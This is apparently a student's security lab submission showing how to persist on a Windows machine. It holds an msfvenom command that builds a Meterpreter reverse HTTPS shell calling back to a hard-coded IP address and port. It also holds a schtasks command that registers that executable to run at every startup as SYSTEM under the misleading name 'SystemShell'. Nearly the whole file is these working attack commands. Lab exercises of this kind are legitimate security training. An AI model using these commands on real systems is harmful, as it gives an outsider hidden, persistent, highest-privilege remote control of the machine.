# Name: Justin Shultz
# ID: m8rZr5w8rON0ii9RiwOdQyzmNtB3
# Lab: Persist on a Windows machine using a scheduled task

# The exe was code generated by the following msfvenom command:
# msfvenom -p windows/x64/meterpreter/reverse_winhttps LHOST=9.53.99.47 LPORT=12345 -f exe > task.exe

schtasks /create /sc onstart /tn "SystemShell" /tr "C:\Users\Public\task.exe" /ru SYSTEM
